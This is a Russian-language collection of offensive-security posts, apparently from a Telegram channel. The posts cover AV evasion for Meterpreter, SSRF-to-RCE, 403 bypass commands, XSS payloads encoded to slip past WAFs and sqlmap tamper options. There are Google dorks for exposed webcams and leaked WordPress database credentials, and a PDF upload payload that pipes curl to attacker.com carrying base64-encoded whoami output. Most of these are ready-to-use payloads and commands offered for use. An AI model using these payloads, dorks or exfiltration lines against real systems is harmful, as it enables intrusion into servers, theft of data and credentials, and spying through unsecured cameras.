📖 Скрытая нагрузка. Обходим антивирус и загружаем Meterpreter из памяти в Windows 10

#malware #av

Инструмент из статьи
Источник

🧨 CVE-2020-35489: Загрузка произвольного файла в плагине Contact Form 7

Свежая критическая уязвимость в одном из самых популярных плагинов для WordPress. На момент публикации статьи минимум 3,5 миллиона сайтов имеют уязвимую версию данного плагина.

#cve #rce

Читать статью

🧨 Переходим от Blind SSRF к RCE:

Один из вариантов, при котором мы можем получить удалённое выполнение кода на сайтах с Blind SSRF:

- Находим 'url=' параметр;
- Проверяем на уязвимость к Blind SSRF;
- С помощью SSRF сканируем 127.0.0.1 и находим открытый порт 6379 (Redis)
- Используем Gopherus для генерации вредоносной ссылки для Redis. Если вы не знакомы с этим инструментом, то рекомендую прочитать данную статью.
- RCE

Redis (port-6379) в данном случае выбран в качестве примера. Инструмент позволяет проводить данную атаку для серверов MySQL (port-3306), PostgreSQL(port-5432), FastCGI (port-9000), Memcached (port-11211), Redis (port-6379), Zabbix (port-10050), SMTP (port-25).

#web #ssrf #rce

🦠 Имитация действий пользователя через обратное соединение

Possessor - инструмент, позволяющий получить обратное соединение с использованием техники имитации пользователя, что не является подозрительным поведением для средств защиты.

По сути, основная идея техники заключается в использовании скрытого вторичного рабочего стола для имитации действий пользователя, минуя при этом анализ антивируса. Подробнее про технику можно почитать здесь.

#malware #av

Инструмент на Github
Видео демонстрация

⛔️ Находим и обходим страницы с ошибкой 403 (доступ запрещен)

Небольшой пример по автоматизации поиска и получения доступа к страницам, к которым доступ запрещен:

▫️Для поиска страниц с ответом 403 используем утилиту dirsearch и выполним команду:

python3 dirsearch.py -r -b -u example.com -i 403 -e php,html,json,aspx,sql,asp,js,txt

▫️Полученные страницы помещаем в .txt файл (например 403.txt).
▫️Устанавливаем утилиту 403bypasser и выполняем команду:

for i in $(cat 403.txt); do python3 403bypasser.py https://example.com/ $i ; done

▫️Ждем результатов с ответом 200 или 302.

Для Burp можем использовать инструмент BurpSuite_403Bypasser.

#web

​​🖼 Взлом с помощью картинки. Полезная нагрузка PHP в изображении.

С помощью инструмента php-jpeg-injector можно производить атаки на веб-приложения, которые запускают изображение .jpeg через графическую библиотеку PHP GD.

Инструмент создаёт новый .jpeg файл с полезной нагрузкой PHP. Зараженный .jpeg файл запускается через gd-библиотеку PHP. PHP интерпретирует полезную нагрузку, введенную в jpeg, и выполняет ее.

#soft #web

Ссылка на GitHub

​​📑 Проводим XSS в CSS теге

Для проведения XSS в теге <style> можно использовать следующую полезную нагрузку:

<style>img{background-image:url('javascript:alert(1)')}</style>

Для обхода WAF:

<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>

#web #xss

​💉 Значение Tamper в Sqlmap для обхода WAF

Ниже приведён список используемых значений tamper в sqlmap при проведении Blind Sql инъекций и обхода средств защиты веб приложений для различных СУБД (систем управления базой данных):

Пример:

sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-db

▫️Для Mysql,Mssql,Postgresql,Oracle (Blind):

between

▫️Mysql (Blind):

ifnull2casewhenisnull
ifnull2ifisnull

▫️Mysql,Mssql,Postgresql,Oracle (Blind):

charencode

▫️Mysql,Mssql,Postgresql (Blind):

charunicodeencode

▫️Mysql (Blind):

commalesslimit
commalessmid

▫️Mysql (Blind):

escapequotes

▫️UTF-8 (Blind):

apostrophemask
overlongutf8
overlongutf8more

▫️Bypass waf in JSON (Blind):

charunicodeescape

▫️Mysql,Postgresql,Oracle (Blind):

greatest

▫️Cloudfare waf (Blind):

xforwardedfor

#web #sql

​​🎄Друзья, всех с наступающим Новым годом!!🍾

Этот год был не простым для многих из нас, в том числе и для меня. Однако, именно благодаря удаленке и такому необычному режиму был создан этот канал 🤗

Я рад, что за пару месяцев так много человек появилось на канале. Мы делаем друг друга лучше и в новом году канал продолжит радовать вас годным контентом!🥳

А сейчас, желаю всем хорошего отдыха и счастливого Нового года!!!❤️

🪦 Почему умирает ваша сессия Meterpreter? Попробуйте эти исправления..

Большинство причин весьма очевидны, хотя могут быть неизвестны новичкам.

Наибольший же интерес представляет пункт, в котором говорится об обходе антивирусных решений, миграции процесса и обфускации полезной нагрузки.

#redteam #av #malware

Читать статью

​​🔗 Необычный случай обхода файрвола веб-приложения (WAF)

- WAF заблокировал тег <img>;
- Атрибут «src» также блокируется;
- Однако, найденный WAF не блокировал тег <image>;
- Используем нагрузку на скрине ниже и получаем XSS.

Данная нагрузка обходит Dotdefender, Comodo и еще несколько WAF.

#web #xss

​​📂 Просмотр директорий Apache при ошибочной конфигурации сервера

Как показывает практика многие ресурсы допускают подобные ошибки при конфигурации.

При настройке Apache по умолчанию, просмотр каталогов отключен для порта 443 (см. скрин ниже). Однако, если отправить запрос на порт 80 (http, вместо https), обратившись через IP адрес вместо доменного имени, то мы сможем просматривать директории (запрос 2).

Запрос 1:
https://example.com/wp-content/uploads -> 403 Forbidden

Запрос 2:
http://1.1.1.1/wp-content/uploads -> 200 OK

#web

​​🧨 Удаленное выполнение кода при загрузке PDF файла

Если на сайте происходит загрузка файла через ImageMagick, Evince, GIMP, и некоторые другие утилиты для PDF/PS, то в большинстве случаев можно загрузить PDF файл и получить удаленное выполнение кода на сервере отправив запрос:

Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl attacker.com/?a=$(whoami|base64)).putdeviceparams
quit

Подробности причин данной уязвимости можно прочитать по ссылке.

#web #rce

​🔍 Находим открытые веб-камеры

Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:

allintitle: "Network Camera NetworkCamera"

intitle:"EvoCam" inurl:"webcam.html"

intitle:"Live View / - AXIS"

intitle:"LiveView / - AXIS" | inurl:view/view.shtml



intitle:"Live View / - AXIS" | inurl:/mjpg/video.mjpg?timestamp

inurl:axis-cgi/jpg

inurl:"MultiCameraFrame?Mode=Motion"

inurl:/view.shtml

inurl:/view/index.shtml

"my webcamXP server!"

#google

​​🏮 Утилита для поиска и эксплуатации CISCO CVE-2020-3452

Просто вводите название организации и утилита просканирует наличие уязвимости в Shodan, а при ее наличии выполнит эксплойт.

Данная уязвимость имеет высокий уровень опасности и касается межсетевого экрана Cisco ASA.

Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать конфиденциальные файлы.

#cve #soft

Ссылка на GitHub

​​🖇 Чего следует избегать при работе на WordPress

1.- Оставлять настройки по умолчанию.
2.- Допускать отсутствия контроля над публичным контентом и политиками.

Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:

"define('DB_USER'," "define('DB_PASSWORD'," ext:txt

#google #wp #web

✉️ История кражи переписки и контактов в iOS-приложениях mail.ru и myMail через XSS

Отличный пример того, как можно произвести XSS, разместив полезную нагрузку в файле, и к чему такая атака может привести.

Ранее, я приводил похожий пример для XML файла. Ознакомиться с ним можете по ссылке.

#xss #ios

Читать статью

📤 Автоматический поиск SSRF уязвимостей

Для поиска SSRF на сайте можно воспользоваться инструментом под названием SSRFire. Просто укажите доменное имя сайта, адрес своего сервера (или Burp Collaborator) и ждите результатов.

Также есть опции для поиска XSS и Open Redirect. Для работы инструмента требуются установленные Python 3.7+ и GO.

#web #xss #ssrf

Ссылка на GitHub

​​🗒 Немного про Shellshock (CVE-2014-7169)

При поиске уязвимостей, если вы видите каталог /cgi-bin на веб-сервере, не забудьте заглянуть в этот каталог в поисках расширений, таких как .sh, .cgi (и даже .py, .pl).

Иногда, это может привести вас к уязвимости под названием Shellshock. В двух словах, Shellshock - это ошибка безопасности, из-за которой bash непреднамеренно выполняет команды из переменных среды. Уязвимость позволяет злоумышленнику удаленно выполнять команды на сервере.

Уязвимость далеко не новая, однако все еще встречается на некоторых серверах.

Если хотите потренироваться в эксплуатации этой уязвимости, то рекомендую эту машину с TryHackMe в качестве цели.

Ещё есть очень познавательный репозиторий на GitHub, посвящённый данной уязвимости.

#cve

​​⛓Уязвимости в плагинах Wordpress

Нашли сайт на Wordpress? Попробуйте проверить на уязвимости установленные там плагины.

Определите установленные плагины с помощью WPScan:

wpscan --url http://example.com/wordpress/ -e ap

Если установленные плагины не имеют известных уязвимостей, то поищите эти плагины на GitHub, потому что большая часть из них с открытым исходным кодом.

Проверьте исходные коды плагинов с помощью инструментов статического анализа кода. Для этого можно использовать Progpilot или другие подобные инструменты.

Таким методом можно найти вектор эксплуатации сайта и если повезёт 0day-уязвимость в плагине.

#web #wp

​​🧬 Поиск уязвимостей с помощью Nuclei

Nuclei - это быстрый инструмент для настраиваемого целевого сканирования на основе шаблонов, сочетающий широкие возможности масштабирования и простоту использования.

Инструмент отлично подойдёт для начальной фазы разведки, чтобы быстро проверить наличие простых или легко обнаруживаемых уязвимостей для заданных целей.

Например, с его помощью можно проверить сайт на наличие CVE за 2020 год с помощью команды:

echo https://example.com | nuclei -t 'cves/CVE-2020*'

Подробнее о функционале и возможностях данного инструмента можете прочитать на его странице GitHub.

#web #soft